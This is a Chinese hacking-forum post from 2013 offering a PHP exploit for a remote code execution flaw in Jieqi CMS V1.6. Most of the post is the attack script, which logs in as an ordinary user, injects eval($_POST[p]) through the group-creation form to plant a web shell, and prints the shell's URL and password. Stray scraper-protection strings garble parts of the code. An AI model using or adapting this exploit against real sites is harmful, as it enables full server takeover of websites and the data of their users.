找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2139|回复: 0
打印 上一主题 下一主题

Jieqi(杰奇)CMS V1.6 PHP代码执行0day漏洞EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 11:28:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
* C! |, r$ u' O( _+ s, E  z% S6 w" P( f9 `0 ~+ f
& m, R4 H8 L) V' f, D
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
: a* d; {6 W( B) P0 k 需要有一个能创建圈子的用户。& i6 g! {/ ~: A+ ^7 {
( x2 u$ }* z  s; S5 V$ g4 b: C
<?php
5 z; @8 D8 C7 Z3 m
' ]# q1 V7 V1 N2 L0 i2 w8 \% ~print_r('' |& O* u3 a5 L- f3 V- x
+---------------------------------------------------------------------------+4 \( ]6 M& x" u/ C  {! @+ |7 J
Jieqi CMS V1.6 PHP Code Injection Exploit' \+ U! p' v; G
by flyh4t0 Z4 J( W) V1 |. b
mail: phpsec at hotmail dot com
% K* x+ ?! x& O: O$ v+ x% i; steam: http://www.wolvez.org
. S0 ~$ u! c8 U% K( Y& J( ^+---------------------------------------------------------------------------+
: y4 |. p4 q0 o1 g" ^6 M4 }'); /**
) i9 o/ s: g( P; O4 `) k * works regardless of php.ini settings
7 V6 \. }/ K9 l* b) j1 P! q- Y*/ if ($argc < 5) { print_r('1 _# n' w# T( d7 i5 d- j9 B- G
+---------------------------------------------------------------------------+
0 i% \. S  D$ [+ v, CUsage: php '.$argv[0].' host path username% v6 o, ~" j: [2 `/ x3 ^/ o
host:      target server (ip/hostname)
& a6 ?+ W1 U. b- Rpath:      path to jieqicms ; U3 [3 A3 ?5 ^4 S: f/ Z
uasename:  a username who can create group) ?  t; g9 E+ l0 E5 n! y- ?9 O& w
Example:
! J; ]& A" O3 L( F* D; dphp '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
% j+ Y2 [+ }0 ^+---------------------------------------------------------------------------+
0 Z* P. B" ]2 @5 l3 D'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------232811682799611 V& J8 L6 ?' N9 W# ?
Content-Disposition: form-data; name="gname"
$ q! v6 w' V) L8 g/ o
% V3 g# P0 j# N9 u& r'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
3 y7 H, z/ Q# V-----------------------------23281168279961+ }3 |5 Z" F2 D4 k6 ~
Content-Disposition: form-data; name="gcatid"- x, i1 E  f0 t3 q9 O

8 l7 i, J8 C2 b) h  N; a1
  w( I9 ^7 q& p2 L/ p; O1 \1 l/ W-----------------------------23281168279961
3 a: S% d$ A- R# z! S. B" jContent-Disposition: form-data; name="gaudit"
( N$ \6 I+ J/ r1 O, m$ U' O 3 [, K/ p2 }5 m4 E
1
% G) i5 K2 l, u+ k/ P2 d1 X-----------------------------23281168279961! }# g/ h7 k4 {6 K4 @5 L: }6 ?
Content-Disposition: form-data; name="gbrief"
  a# {  n3 m1 h( u: x3 T & o. M! G. p! v' h( [, D/ [
1
, @- r( |* l7 m  g0 [7 ~& Z4 g# i-----------------------------23281168279961--
, X5 t( H3 r" \) X" y'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com, x2 j* x# S3 A7 [* A
8 ~8 S6 k) v3 d: Y  N" W% H
preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url;
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表